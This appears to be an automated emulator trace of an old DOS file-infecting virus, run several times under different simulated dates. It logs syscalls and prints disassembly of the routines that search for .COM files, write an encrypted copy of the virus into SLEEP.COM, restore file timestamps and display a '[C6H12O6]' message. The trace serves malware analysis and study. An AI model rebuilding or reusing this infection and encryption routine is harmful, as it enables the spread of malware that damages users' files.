2018-12-25T11:49:14.542119833Z 63 PC: 12ada | Read file or device (See above)
2018-12-25T11:49:14.548687248Z 66 PC: 12b0b | Move file pointer (See above)
2018-12-25T11:49:14.550326002Z 64 PC: 12b19 | Write file or device (See above)
2018-12-25T11:49:14.554249674Z 66 PC: 12b22 | Move file pointer (See above)
2018-12-25T11:49:14.555894381Z 64 PC: 12b30 | Write file or device (See above)
2018-12-25T11:49:14.558761329Z 44 PC: 12b45 | Get time (See above)
2018-12-25T11:49:14.562225554Z 64 PC: 12b76 | Write file or device (See above)
2018-12-25T11:49:14.565092301Z 87 PC: 12b83 | Get or set file date and time (See above)
2018-12-25T11:49:14.56682802Z 62 PC: 12b87 | Close file (See above)
2018-12-25T11:49:14.575391736Z 79 PC: 12aaa | Find next file (See above)
2018-12-25T11:49:14.578609325Z 61 PC: 12aca | Open file (See above)
2018-12-25T11:49:14.585303454Z 63 PC: 12ada | Read file or device (See above)
2018-12-25T11:49:14.592607936Z 87 PC: 12b83 | Get or set file date and time (See above)
2018-12-25T11:49:14.594696072Z 62 PC: 12b87 | Close file (See above)
2018-12-25T11:49:14.599104983Z 79 PC: 12aaa | Find next file (See above)
2018-12-25T11:49:14.601265217Z 42 PC: 12bae | Get date 0x12bae: cmp dl, 0xe
0x12bb1: jne 0x12bbf
0x12bb3: call 0x12bb6
0x12bb6: pop dx
0x12bb7: add dx, 0xa
0x12bbb: mov ah, 9
0x12bbd: int 0x21
0x12bbf: ret
0x12bc0: pop bx
0x12bc1: inc bx
0x12bc2: dec ax
0x12bc4: xor word ptr [bp + si], si
0x12bc6: dec di
0x12bc7: pop bp
0x12bc9: and byte ptr [si], ah
0x12bcb: add byte ptr [bp + si + 0x6c], al
0x12bce: outsw dx, word ptr [si]
0x12bcf: outsw dx, word ptr [si]
0x12bd0: and byte ptr fs:[bp + di + 0x75], dl
0x12bd4: popaw
2018-12-25T11:49:14.60307851Z 76 PC: 12a44 | Terminate with return code (Return code = '4')

{"DateBased":true,"Day":14,"Month":1,"Year":1980,"Hour":0,"Min":0,"Second":0,"TimeBased":false,"OriginalID":3442,"SideJobID":0}

.

GIF

Syscalls:

Time Syscall Op Syscall Name
2018-12-25T13:06:51.49324165Z 42 PC: 12a7d | Get date 0x12a7d: cmp al, 4
0x12a7f: jne 0x12a8d
0x12a81: call 0x12a84
0x12a84: pop dx
0x12a85: add dx, 0x3b
0x12a89: mov ah, 0x3b
0x12a8b: int 0x21
0x12a8d: mov ah, 0x4e
0x12a8f: xor cx, cx
0x12a91: call 0x12a94
0x12a94: pop dx
0x12a95: add dx, 0x25
0x12a99: int 0x21
0x12a9b: jb 0x12aa3
0x12a9d: call 0x12ac2
0x12aa0: jmp 0x12aa6
0x12aa3: jmp 0x12b88
0x12aa6: mov ah, 0x4f
0x12aa8: int 0x21
0x12aaa: jb 0x12aa3
2018-12-25T13:06:51.496331262Z 78 PC: 12a9b | Find first file
2018-12-25T13:06:51.503307932Z 61 PC: 12aca | Open file (Filename = 'SLEEP.COM')
2018-12-25T13:06:51.511587929Z 63 PC: 12ada | Read file or device (Read 4 bytes on handle 5)
2018-12-25T13:06:51.521975089Z 66 PC: 12b0b | Move file pointer
2018-12-25T13:06:51.535658516Z 64 PC: 12b19 | Write file or device (Write 4 bytes on handle 5)
2018-12-25T13:06:51.540120828Z 66 PC: 12b22 | Move file pointer
2018-12-25T13:06:51.542094469Z 64 PC: 12b30 | Write file or device (Write 4 bytes on handle 5)
2018-12-25T13:06:51.547566153Z 44 PC: 12b45 | Get time 0x12b45: mov ah, dh
0x12b47: add ah, byte ptr [bx]
0x12b49: mov byte ptr [bx], ah
0x12b4b: mov dl, byte ptr [0x9a]
0x12b4f: add dl, byte ptr [bx + 1]
0x12b52: or dl, 1
0x12b55: mov byte ptr [bx + 1], dl
0x12b58: mov cx, 0x26
0x12b5b: rep movsb byte ptr es:[di], byte ptr [si]
0x12b5d: mov cx, 0x19c
0x12b60: sub cx, 0x26
0x12b63: lodsb al, byte ptr [si]
0x12b64: add al, ah
0x12b66: add ah, dl
0x12b68: stosb byte ptr es:[di], al
0x12b69: loop 0x12b63
0x12b6b: pop bx
0x12b6c: mov dx, 0xfaa0
0x12b6f: mov cx, 0x19c
0x12b72: mov ah, 0x40
2018-12-25T13:06:51.550463322Z 64 PC: 12b76 | Write file or device (Write 412 bytes on handle 5)
2018-12-25T13:06:51.566594541Z 87 PC: 12b83 | Get or set file date and time
2018-12-25T13:06:51.569249786Z 62 PC: 12b87 | Close file
2018-12-25T13:06:51.57806048Z 79 PC: 12aaa | Find next file
2018-12-25T13:06:51.589348434Z 61 PC: 12aca | Open file (See above)
2018-12-25T13:06:51.59816561Z 63 PC: 12ada | Read file or device (See above)
2018-12-25T13:06:51.606418485Z 66 PC: 12b0b | Move file pointer (See above)
2018-12-25T13:06:51.608440015Z 64 PC: 12b19 | Write file or device (See above)
2018-12-25T13:06:51.6121493Z 66 PC: 12b22 | Move file pointer (See above)
2018-12-25T13:06:51.620139841Z 64 PC: 12b30 | Write file or device (See above)
2018-12-25T13:06:51.624297575Z 44 PC: 12b45 | Get time (See above)
2018-12-25T13:06:51.627470428Z 64 PC: 12b76 | Write file or device (See above)
2018-12-25T13:06:51.630797813Z 87 PC: 12b83 | Get or set file date and time (See above)
2018-12-25T13:06:51.632419635Z 62 PC: 12b87 | Close file (See above)
2018-12-25T13:06:51.641044655Z 79 PC: 12aaa | Find next file (See above)
2018-12-25T13:06:51.648822762Z 61 PC: 12aca | Open file (See above)
2018-12-25T13:06:51.656932226Z 63 PC: 12ada | Read file or device (See above)
2018-12-25T13:06:51.664683973Z 66 PC: 12b0b | Move file pointer (See above)
2018-12-25T13:06:51.667834011Z 64 PC: 12b19 | Write file or device (See above)
2018-12-25T13:06:51.671107239Z 66 PC: 12b22 | Move file pointer (See above)
2018-12-25T13:06:51.672979479Z 64 PC: 12b30 | Write file or device (See above)
2018-12-25T13:06:51.677187715Z 44 PC: 12b45 | Get time (See above)
2018-12-25T13:06:51.68040834Z 64 PC: 12b76 | Write file or device (See above)
2018-12-25T13:06:51.683693424Z 87 PC: 12b83 | Get or set file date and time (See above)
2018-12-25T13:06:51.686445114Z 62 PC: 12b87 | Close file (See above)
2018-12-25T13:06:51.697308615Z 79 PC: 12aaa | Find next file (See above)
2018-12-25T13:06:51.70061535Z 61 PC: 12aca | Open file (See above)
2018-12-25T13:06:51.708460263Z 63 PC: 12ada | Read file or device (See above)
2018-12-25T13:06:51.717230462Z 66 PC: 12b0b | Move file pointer (See above)
2018-12-25T13:06:51.719113725Z 64 PC: 12b19 | Write file or device (See above)
2018-12-25T13:06:51.722374355Z 66 PC: 12b22 | Move file pointer (See above)
2018-12-25T13:06:51.725369586Z 64 PC: 12b30 | Write file or device (See above)
2018-12-25T13:06:51.728654356Z 44 PC: 12b45 | Get time (See above)
2018-12-25T13:06:51.731496902Z 64 PC: 12b76 | Write file or device (See above)
2018-12-25T13:06:51.735767674Z 87 PC: 12b83 | Get or set file date and time (See above)
2018-12-25T13:06:51.738145901Z 62 PC: 12b87 | Close file (See above)
2018-12-25T13:06:51.746622137Z 79 PC: 12aaa | Find next file (See above)
2018-12-25T13:06:51.750788239Z 61 PC: 12aca | Open file (See above)
2018-12-25T13:06:51.760186019Z 63 PC: 12ada | Read file or device (See above)
2018-12-25T13:06:51.767673485Z 66 PC: 12b0b | Move file pointer (See above)
2018-12-25T13:06:51.77003887Z 64 PC: 12b19 | Write file or device (See above)
2018-12-25T13:06:51.773884298Z 66 PC: 12b22 | Move file pointer (See above)
2018-12-25T13:06:51.775922277Z 64 PC: 12b30 | Write file or device (See above)
2018-12-25T13:06:51.779367603Z 44 PC: 12b45 | Get time (See above)
2018-12-25T13:06:51.783477052Z 64 PC: 12b76 | Write file or device (See above)
2018-12-25T13:06:51.786912192Z 87 PC: 12b83 | Get or set file date and time (See above)
2018-12-25T13:06:51.789031438Z 62 PC: 12b87 | Close file (See above)
2018-12-25T13:06:51.798461491Z 79 PC: 12aaa | Find next file (See above)
2018-12-25T13:06:51.802275832Z 61 PC: 12aca | Open file (See above)
2018-12-25T13:06:51.810088694Z 63 PC: 12ada | Read file or device (See above)
2018-12-25T13:06:51.818597635Z 66 PC: 12b0b | Move file pointer (See above)
2018-12-25T13:06:51.821030011Z 64 PC: 12b19 | Write file or device (See above)
2018-12-25T13:06:51.824395075Z 66 PC: 12b22 | Move file pointer (See above)
2018-12-25T13:06:51.826583104Z 64 PC: 12b30 | Write file or device (See above)
2018-12-25T13:06:51.83086254Z 44 PC: 12b45 | Get time (See above)
2018-12-25T13:06:51.83445716Z 64 PC: 12b76 | Write file or device (See above)
2018-12-25T13:06:51.843484056Z 87 PC: 12b83 | Get or set file date and time (See above)
2018-12-25T13:06:51.84620406Z 62 PC: 12b87 | Close file (See above)
2018-12-25T13:06:51.85538747Z 79 PC: 12aaa | Find next file (See above)
2018-12-25T13:06:51.858734819Z 61 PC: 12aca | Open file (See above)
2018-12-25T13:06:51.867664392Z 63 PC: 12ada | Read file or device (See above)
2018-12-25T13:06:51.875550434Z 66 PC: 12b0b | Move file pointer (See above)
2018-12-25T13:06:51.8778939Z 64 PC: 12b19 | Write file or device (See above)
2018-12-25T13:06:51.882358021Z 66 PC: 12b22 | Move file pointer (See above)
2018-12-25T13:06:51.884994396Z 64 PC: 12b30 | Write file or device (See above)
2018-12-25T13:06:51.888444839Z 44 PC: 12b45 | Get time (See above)
2018-12-25T13:06:51.892079674Z 64 PC: 12b76 | Write file or device (See above)
2018-12-25T13:06:51.895844808Z 87 PC: 12b83 | Get or set file date and time (See above)
2018-12-25T13:06:51.897947656Z 62 PC: 12b87 | Close file (See above)
2018-12-25T13:06:51.907889105Z 79 PC: 12aaa | Find next file (See above)
2018-12-25T13:06:51.911177099Z 61 PC: 12aca | Open file (See above)
2018-12-25T13:06:51.918269504Z 63 PC: 12ada | Read file or device (See above)
2018-12-25T13:06:51.921393477Z 87 PC: 12b83 | Get or set file date and time (See above)
2018-12-25T13:06:51.924391187Z 62 PC: 12b87 | Close file (See above)
2018-12-25T13:06:51.932521807Z 79 PC: 12aaa | Find next file (See above)
2018-12-25T13:06:51.935888021Z 42 PC: 12bae | Get date 0x12bae: cmp dl, 0xe
0x12bb1: jne 0x12bbf
0x12bb3: call 0x12bb6
0x12bb6: pop dx
0x12bb7: add dx, 0xa
0x12bbb: mov ah, 9
0x12bbd: int 0x21
0x12bbf: ret
0x12bc0: pop bx
0x12bc1: inc bx
0x12bc2: dec ax
0x12bc4: xor word ptr [bp + si], si
0x12bc6: dec di
0x12bc7: pop bp
0x12bc9: and byte ptr [si], ah
0x12bcb: add byte ptr [bp + si + 0x6c], al
0x12bce: outsw dx, word ptr [si]
0x12bcf: outsw dx, word ptr [si]
0x12bd0: and byte ptr fs:[bp + di + 0x75], dl
0x12bd4: popaw
2018-12-25T13:06:51.940082424Z 9 PC: 12bbf | Display string (String= '[C6H12O6] ')
2018-12-25T13:06:51.942899746Z 76 PC: 12a44 | Terminate with return code (Return code = '36')

{"DateBased":true,"Day":1,"Month":1,"Year":1980,"Hour":0,"Min":0,"Second":0,"TimeBased":false,"OriginalID":3442,"SideJobID":0}

.

GIF

Syscalls:

Time Syscall Op Syscall Name
2018-12-25T11:49:13.771934095Z 42 PC: 12a7d | Get date 0x12a7d: cmp al, 4
0x12a7f: jne 0x12a8d
0x12a81: call 0x12a84
0x12a84: pop dx
0x12a85: add dx, 0x3b
0x12a89: mov ah, 0x3b
0x12a8b: int 0x21
0x12a8d: mov ah, 0x4e
0x12a8f: xor cx, cx
0x12a91: call 0x12a94
0x12a94: pop dx
0x12a95: add dx, 0x25
0x12a99: int 0x21
0x12a9b: jb 0x12aa3
0x12a9d: call 0x12ac2
0x12aa0: jmp 0x12aa6
0x12aa3: jmp 0x12b88
0x12aa6: mov ah, 0x4f
0x12aa8: int 0x21
0x12aaa: jb 0x12aa3
2018-12-25T11:49:13.774557476Z 78 PC: 12a9b | Find first file
2018-12-25T11:49:13.780515252Z 61 PC: 12aca | Open file (Filename = 'SLEEP.COM')
2018-12-25T11:49:13.785900461Z 63 PC: 12ada | Read file or device (Read 4 bytes on handle 5)
2018-12-25T11:49:13.79274158Z 66 PC: 12b0b | Move file pointer
2018-12-25T11:49:13.794127676Z 64 PC: 12b19 | Write file or device (Write 4 bytes on handle 5)
2018-12-25T11:49:13.796531886Z 66 PC: 12b22 | Move file pointer
2018-12-25T11:49:13.802265039Z 64 PC: 12b30 | Write file or device (Write 4 bytes on handle 5)
2018-12-25T11:49:13.805383219Z 44 PC: 12b45 | Get time 0x12b45: mov ah, dh
0x12b47: add ah, byte ptr [bx]
0x12b49: mov byte ptr [bx], ah
0x12b4b: mov dl, byte ptr [0x9a]
0x12b4f: add dl, byte ptr [bx + 1]
0x12b52: or dl, 1
0x12b55: mov byte ptr [bx + 1], dl
0x12b58: mov cx, 0x26
0x12b5b: rep movsb byte ptr es:[di], byte ptr [si]
0x12b5d: mov cx, 0x19c
0x12b60: sub cx, 0x26
0x12b63: lodsb al, byte ptr [si]
0x12b64: add al, ah
0x12b66: add ah, dl
0x12b68: stosb byte ptr es:[di], al
0x12b69: loop 0x12b63
0x12b6b: pop bx
0x12b6c: mov dx, 0xfaa0
0x12b6f: mov cx, 0x19c
0x12b72: mov ah, 0x40
2018-12-25T11:49:13.807856478Z 64 PC: 12b76 | Write file or device (Write 412 bytes on handle 5)
2018-12-25T11:49:14.277292431Z 87 PC: 12b83 | Get or set file date and time
2018-12-25T11:49:14.27994529Z 62 PC: 12b87 | Close file
2018-12-25T11:49:14.287340807Z 79 PC: 12aaa | Find next file
2018-12-25T11:49:14.290596023Z 61 PC: 12aca | Open file (See above)
2018-12-25T11:49:14.29914325Z 63 PC: 12ada | Read file or device (See above)
2018-12-25T11:49:14.306741662Z 66 PC: 12b0b | Move file pointer (See above)
2018-12-25T11:49:14.313537089Z 64 PC: 12b19 | Write file or device (See above)
2018-12-25T11:49:14.317755279Z 66 PC: 12b22 | Move file pointer (See above)
2018-12-25T11:49:14.319425881Z 64 PC: 12b30 | Write file or device (See above)
2018-12-25T11:49:14.322347354Z 44 PC: 12b45 | Get time (See above)
2018-12-25T11:49:14.325795128Z 64 PC: 12b76 | Write file or device (See above)
2018-12-25T11:49:14.329065706Z 87 PC: 12b83 | Get or set file date and time (See above)
2018-12-25T11:49:14.330696277Z 62 PC: 12b87 | Close file (See above)
2018-12-25T11:49:14.344251712Z 79 PC: 12aaa | Find next file (See above)
2018-12-25T11:49:14.347049515Z 61 PC: 12aca | Open file (See above)
2018-12-25T11:49:14.353866547Z 63 PC: 12ada | Read file or device (See above)
2018-12-25T11:49:14.36460173Z 66 PC: 12b0b | Move file pointer (See above)
2018-12-25T11:49:14.365990413Z 64 PC: 12b19 | Write file or device (See above)
2018-12-25T11:49:14.368392646Z 66 PC: 12b22 | Move file pointer (See above)
2018-12-25T11:49:14.369881153Z 64 PC: 12b30 | Write file or device (See above)
2018-12-25T11:49:14.3724856Z 44 PC: 12b45 | Get time (See above)
2018-12-25T11:49:14.37455132Z 64 PC: 12b76 | Write file or device (See above)
2018-12-25T11:49:14.377071716Z 87 PC: 12b83 | Get or set file date and time (See above)
2018-12-25T11:49:14.378670331Z 62 PC: 12b87 | Close file (See above)
2018-12-25T11:49:14.38647916Z 79 PC: 12aaa | Find next file (See above)
2018-12-25T11:49:14.389313787Z 61 PC: 12aca | Open file (See above)
2018-12-25T11:49:14.396654555Z 63 PC: 12ada | Read file or device (See above)
2018-12-25T11:49:14.403228658Z 66 PC: 12b0b | Move file pointer (See above)
2018-12-25T11:49:14.404859292Z 64 PC: 12b19 | Write file or device (See above)
2018-12-25T11:49:14.408710779Z 66 PC: 12b22 | Move file pointer (See above)
2018-12-25T11:49:14.410378464Z 64 PC: 12b30 | Write file or device (See above)
2018-12-25T11:49:14.413258512Z 44 PC: 12b45 | Get time (See above)
2018-12-25T11:49:14.416284494Z 64 PC: 12b76 | Write file or device (See above)
2018-12-25T11:49:14.41927149Z 87 PC: 12b83 | Get or set file date and time (See above)
2018-12-25T11:49:14.421015729Z 62 PC: 12b87 | Close file (See above)
2018-12-25T11:49:14.429485528Z 79 PC: 12aaa | Find next file (See above)
2018-12-25T11:49:14.433308836Z 61 PC: 12aca | Open file (See above)
2018-12-25T11:49:14.440127833Z 63 PC: 12ada | Read file or device (See above)
2018-12-25T11:49:14.447776963Z 66 PC: 12b0b | Move file pointer (See above)
2018-12-25T11:49:14.449421686Z 64 PC: 12b19 | Write file or device (See above)
2018-12-25T11:49:14.452337489Z 66 PC: 12b22 | Move file pointer (See above)
2018-12-25T11:49:14.454645264Z 64 PC: 12b30 | Write file or device (See above)
2018-12-25T11:49:14.457493052Z 44 PC: 12b45 | Get time (See above)
2018-12-25T11:49:14.460030811Z 64 PC: 12b76 | Write file or device (See above)
2018-12-25T11:49:14.46325647Z 87 PC: 12b83 | Get or set file date and time (See above)
2018-12-25T11:49:14.465276132Z 62 PC: 12b87 | Close file (See above)
2018-12-25T11:49:14.481227626Z 79 PC: 12aaa | Find next file (See above)
2018-12-25T11:49:14.484439426Z 61 PC: 12aca | Open file (See above)
2018-12-25T11:49:14.491371218Z 63 PC: 12ada | Read file or device (See above)
2018-12-25T11:49:14.498465509Z 66 PC: 12b0b | Move file pointer (See above)
2018-12-25T11:49:14.50099418Z 64 PC: 12b19 | Write file or device (See above)
2018-12-25T11:49:14.504213638Z 66 PC: 12b22 | Move file pointer (See above)
2018-12-25T11:49:14.505839666Z 64 PC: 12b30 | Write file or device (See above)
2018-12-25T11:49:14.509348485Z 44 PC: 12b45 | Get time (See above)
2018-12-25T11:49:14.512067549Z 64 PC: 12b76 | Write file or device (See above)
2018-12-25T11:49:14.520199783Z 87 PC: 12b83 | Get or set file date and time (See above)
2018-12-25T11:49:14.522173759Z 62 PC: 12b87 | Close file (See above)
2018-12-25T11:49:14.531368455Z 79 PC: 12aaa | Find next file (See above)
2018-12-25T11:49:14.534279704Z 61 PC: 12aca | Open file (See above)
2018-12-25T11:49:14.541047712Z 63 PC: 12ada | Read file or device (See above)
2018-12-25T11:49:14.558850842Z 66 PC: 12b0b | Move file pointer (See above)
2018-12-25T11:49:14.560234122Z 64 PC: 12b19 | Write file or device (See above)
2018-12-25T11:49:14.56277806Z 66 PC: 12b22 | Move file pointer (See above)
2018-12-25T11:49:14.565622059Z 64 PC: 12b30 | Write file or device (See above)
2018-12-25T11:49:14.568325216Z 44 PC: 12b45 | Get time (See above)
2018-12-25T11:49:14.570573855Z 64 PC: 12b76 | Write file or device (See above)
2018-12-25T11:49:14.574382473Z 87 PC: 12b83 | Get or set file date and time (See above)
2018-12-25T11:49:14.576167833Z 62 PC: 12b87 | Close file (See above)
2018-12-25T11:49:14.58348357Z 79 PC: 12aaa | Find next file (See above)
2018-12-25T11:49:14.588595426Z 61 PC: 12aca | Open file (See above)
2018-12-25T11:49:14.597318851Z 63 PC: 12ada | Read file or device (See above)
2018-12-25T11:49:14.600268051Z 87 PC: 12b83 | Get or set file date and time (See above)
2018-12-25T11:49:14.602991565Z 62 PC: 12b87 | Close file (See above)
2018-12-25T11:49:14.61076113Z 79 PC: 12aaa | Find next file (See above)
2018-12-25T11:49:14.613765382Z 42 PC: 12bae | Get date 0x12bae: cmp dl, 0xe
0x12bb1: jne 0x12bbf
0x12bb3: call 0x12bb6
0x12bb6: pop dx
0x12bb7: add dx, 0xa
0x12bbb: mov ah, 9
0x12bbd: int 0x21
0x12bbf: ret
0x12bc0: pop bx
0x12bc1: inc bx
0x12bc2: dec ax
0x12bc4: xor word ptr [bp + si], si
0x12bc6: dec di
0x12bc7: pop bp
0x12bc9: and byte ptr [si], ah
0x12bcb: add byte ptr [bp + si + 0x6c], al
0x12bce: outsw dx, word ptr [si]
0x12bcf: outsw dx, word ptr [si]
0x12bd0: and byte ptr fs:[bp + di + 0x75], dl
0x12bd4: popaw
2018-12-25T11:49:14.616916815Z 76 PC: 12a44 | Terminate with return code (Return code = '2')

{"DateBased":true,"Day":3,"Month":1,"Year":1980,"Hour":0,"Min":0,"Second":0,"TimeBased":false,"OriginalID":3442,"SideJobID":0}

.

GIF

Syscalls:

Time Syscall Op Syscall Name
2018-12-25T11:49:13.780425682Z 42 PC: 12a7d | Get date 0x12a7d: cmp al, 4
0x12a7f: jne 0x12a8d
0x12a81: call 0x12a84
0x12a84: pop dx
0x12a85: add dx, 0x3b
0x12a89: mov ah, 0x3b
0x12a8b: int 0x21
0x12a8d: mov ah, 0x4e
0x12a8f: xor cx, cx
0x12a91: call 0x12a94
0x12a94: pop dx
0x12a95: add dx, 0x25
0x12a99: int 0x21
0x12a9b: jb 0x12aa3
0x12a9d: call 0x12ac2
0x12aa0: jmp 0x12aa6
0x12aa3: jmp 0x12b88
0x12aa6: mov ah, 0x4f
0x12aa8: int 0x21
0x12aaa: jb 0x12aa3
2018-12-25T11:49:13.784212165Z 59 PC: 12a8d | Change current directory
2018-12-25T11:49:13.788706085Z 78 PC: 12a9b | Find first file
2018-12-25T11:49:13.794707526Z 61 PC: 12aca | Open file (Filename = 'SLEEP.COM')
2018-12-25T11:49:13.803033659Z 63 PC: 12ada | Read file or device (Read 4 bytes on handle 5)
2018-12-25T11:49:13.810807162Z 66 PC: 12b0b | Move file pointer
2018-12-25T11:49:13.812767277Z 64 PC: 12b19 | Write file or device (Write 4 bytes on handle 5)
2018-12-25T11:49:13.817291564Z 66 PC: 12b22 | Move file pointer
2018-12-25T11:49:13.81991217Z 64 PC: 12b30 | Write file or device (Write 4 bytes on handle 5)
2018-12-25T11:49:13.824079948Z 44 PC: 12b45 | Get time 0x12b45: mov ah, dh
0x12b47: add ah, byte ptr [bx]
0x12b49: mov byte ptr [bx], ah
0x12b4b: mov dl, byte ptr [0x9a]
0x12b4f: add dl, byte ptr [bx + 1]
0x12b52: or dl, 1
0x12b55: mov byte ptr [bx + 1], dl
0x12b58: mov cx, 0x26
0x12b5b: rep movsb byte ptr es:[di], byte ptr [si]
0x12b5d: mov cx, 0x19c
0x12b60: sub cx, 0x26
0x12b63: lodsb al, byte ptr [si]
0x12b64: add al, ah
0x12b66: add ah, dl
0x12b68: stosb byte ptr es:[di], al
0x12b69: loop 0x12b63
0x12b6b: pop bx
0x12b6c: mov dx, 0xfaa0
0x12b6f: mov cx, 0x19c
0x12b72: mov ah, 0x40
2018-12-25T11:49:13.828430064Z 64 PC: 12b76 | Write file or device (Write 412 bytes on handle 5)
2018-12-25T11:49:14.276802189Z 87 PC: 12b83 | Get or set file date and time
2018-12-25T11:49:14.278759597Z 62 PC: 12b87 | Close file
2018-12-25T11:49:14.287929591Z 79 PC: 12aaa | Find next file
2018-12-25T11:49:14.295164644Z 61 PC: 12aca | Open file (See above)
2018-12-25T11:49:14.302035363Z 63 PC: 12ada | Read file or device (See above)
2018-12-25T11:49:14.308757059Z 66 PC: 12b0b | Move file pointer (See above)
2018-12-25T11:49:14.311152805Z 64 PC: 12b19 | Write file or device (See above)
2018-12-25T11:49:14.314376887Z 66 PC: 12b22 | Move file pointer (See above)
2018-12-25T11:49:14.3157967Z 64 PC: 12b30 | Write file or device (See above)
2018-12-25T11:49:14.322597596Z 44 PC: 12b45 | Get time (See above)
2018-12-25T11:49:14.335299267Z 64 PC: 12b76 | Write file or device (See above)
2018-12-25T11:49:14.338743912Z 87 PC: 12b83 | Get or set file date and time (See above)
2018-12-25T11:49:14.341011807Z 62 PC: 12b87 | Close file (See above)
2018-12-25T11:49:14.34958458Z 79 PC: 12aaa | Find next file (See above)
2018-12-25T11:49:14.353513061Z 61 PC: 12aca | Open file (See above)
2018-12-25T11:49:14.36127242Z 63 PC: 12ada | Read file or device (See above)
2018-12-25T11:49:14.368334129Z 66 PC: 12b0b | Move file pointer (See above)
2018-12-25T11:49:14.370037159Z 64 PC: 12b19 | Write file or device (See above)
2018-12-25T11:49:14.373278068Z 66 PC: 12b22 | Move file pointer (See above)
2018-12-25T11:49:14.37612392Z 64 PC: 12b30 | Write file or device (See above)
2018-12-25T11:49:14.379119264Z 44 PC: 12b45 | Get time (See above)
2018-12-25T11:49:14.381662776Z 64 PC: 12b76 | Write file or device (See above)
2018-12-25T11:49:14.38591286Z 87 PC: 12b83 | Get or set file date and time (See above)
2018-12-25T11:49:14.387755381Z 62 PC: 12b87 | Close file (See above)
2018-12-25T11:49:14.410652887Z 79 PC: 12aaa | Find next file (See above)
2018-12-25T11:49:14.414264548Z 61 PC: 12aca | Open file (See above)
2018-12-25T11:49:14.420839098Z 63 PC: 12ada | Read file or device (See above)
2018-12-25T11:49:14.427613599Z 66 PC: 12b0b | Move file pointer (See above)
2018-12-25T11:49:14.43004363Z 64 PC: 12b19 | Write file or device (See above)
2018-12-25T11:49:14.432695689Z 66 PC: 12b22 | Move file pointer (See above)
2018-12-25T11:49:14.434032301Z 64 PC: 12b30 | Write file or device (See above)
2018-12-25T11:49:14.437269872Z 44 PC: 12b45 | Get time (See above)
2018-12-25T11:49:14.439700706Z 64 PC: 12b76 | Write file or device (See above)
2018-12-25T11:49:14.442340406Z 87 PC: 12b83 | Get or set file date and time (See above)
2018-12-25T11:49:14.447293538Z 62 PC: 12b87 | Close file (See above)
2018-12-25T11:49:14.455293889Z 79 PC: 12aaa | Find next file (See above)
2018-12-25T11:49:14.45800537Z 61 PC: 12aca | Open file (See above)
2018-12-25T11:49:14.465261096Z 63 PC: 12ada | Read file or device (See above)
2018-12-25T11:49:14.471593729Z 66 PC: 12b0b | Move file pointer (See above)
2018-12-25T11:49:14.47292369Z 64 PC: 12b19 | Write file or device (See above)
2018-12-25T11:49:14.476166881Z 66 PC: 12b22 | Move file pointer (See above)
2018-12-25T11:49:14.477551577Z 64 PC: 12b30 | Write file or device (See above)
2018-12-25T11:49:14.480148917Z 44 PC: 12b45 | Get time (See above)
2018-12-25T11:49:14.48307565Z 64 PC: 12b76 | Write file or device (See above)
2018-12-25T11:49:14.485877173Z 87 PC: 12b83 | Get or set file date and time (See above)
2018-12-25T11:49:14.488690765Z 62 PC: 12b87 | Close file (See above)
2018-12-25T11:49:14.497407136Z 79 PC: 12aaa | Find next file (See above)
2018-12-25T11:49:14.500290841Z 61 PC: 12aca | Open file (See above)
2018-12-25T11:49:14.507723612Z 63 PC: 12ada | Read file or device (See above)
2018-12-25T11:49:14.516211514Z 66 PC: 12b0b | Move file pointer (See above)
2018-12-25T11:49:14.518071087Z 64 PC: 12b19 | Write file or device (See above)
2018-12-25T11:49:14.520682789Z 66 PC: 12b22 | Move file pointer (See above)
2018-12-25T11:49:14.522618902Z 64 PC: 12b30 | Write file or device (See above)
2018-12-25T11:49:14.526494652Z 44 PC: 12b45 | Get time (See above)
2018-12-25T11:49:14.528996208Z 64 PC: 12b76 | Write file or device (See above)
2018-12-25T11:49:14.537705983Z 87 PC: 12b83 | Get or set file date and time (See above)
2018-12-25T11:49:14.540562667Z 62 PC: 12b87 | Close file (See above)
2018-12-25T11:49:14.548426206Z 79 PC: 12aaa | Find next file (See above)
2018-12-25T11:49:14.551434654Z 61 PC: 12aca | Open file (See above)
2018-12-25T11:49:14.559266107Z 63 PC: 12ada | Read file or device (See above)
2018-12-25T11:49:14.566364539Z 66 PC: 12b0b | Move file pointer (See above)
2018-12-25T11:49:14.568006431Z 64 PC: 12b19 | Write file or device (See above)
2018-12-25T11:49:14.571989682Z 66 PC: 12b22 | Move file pointer (See above)
2018-12-25T11:49:14.573728156Z 64 PC: 12b30 | Write file or device (See above)
2018-12-25T11:49:14.576657381Z 44 PC: 12b45 | Get time (See above)
2018-12-25T11:49:14.580035839Z 64 PC: 12b76 | Write file or device (See above)
2018-12-25T11:49:14.583291942Z 87 PC: 12b83 | Get or set file date and time (See above)
2018-12-25T11:49:14.585457133Z 62 PC: 12b87 | Close file (See above)
2018-12-25T11:49:14.593874905Z 79 PC: 12aaa | Find next file (See above)
2018-12-25T11:49:14.59708961Z 61 PC: 12aca | Open file (See above)
2018-12-25T11:49:14.603810573Z 63 PC: 12ada | Read file or device (See above)
2018-12-25T11:49:14.607728798Z 87 PC: 12b83 | Get or set file date and time (See above)
2018-12-25T11:49:14.610032827Z 62 PC: 12b87 | Close file (See above)
2018-12-25T11:49:14.617191756Z 79 PC: 12aaa | Find next file (See above)
2018-12-25T11:49:14.620764753Z 42 PC: 12bae | Get date 0x12bae: cmp dl, 0xe
0x12bb1: jne 0x12bbf
0x12bb3: call 0x12bb6
0x12bb6: pop dx
0x12bb7: add dx, 0xa
0x12bbb: mov ah, 9
0x12bbd: int 0x21
0x12bbf: ret
0x12bc0: pop bx
0x12bc1: inc bx
0x12bc2: dec ax
0x12bc4: xor word ptr [bp + si], si
0x12bc6: dec di
0x12bc7: pop bp
0x12bc9: and byte ptr [si], ah
0x12bcb: add byte ptr [bp + si + 0x6c], al
0x12bce: outsw dx, word ptr [si]
0x12bcf: outsw dx, word ptr [si]
0x12bd0: and byte ptr fs:[bp + di + 0x75], dl
0x12bd4: popaw
2018-12-25T11:49:14.623176833Z 76 PC: 12a44 | Terminate with return code (Return code = '4')

{"DateBased":true,"Day":1,"Month":1,"Year":1980,"Hour":0,"Min":0,"Second":0,"TimeBased":false,"OriginalID":3442,"SideJobID":0}

.

GIF

Syscalls:

Time Syscall Op Syscall Name
2018-12-25T11:49:13.79068177Z 42 PC: 12a7d | Get date 0x12a7d: cmp al, 4
0x12a7f: jne 0x12a8d
0x12a81: call 0x12a84
0x12a84: pop dx
0x12a85: add dx, 0x3b
0x12a89: mov ah, 0x3b
0x12a8b: int 0x21
0x12a8d: mov ah, 0x4e
0x12a8f: xor cx, cx
0x12a91: call 0x12a94
0x12a94: pop dx
0x12a95: add dx, 0x25
0x12a99: int 0x21
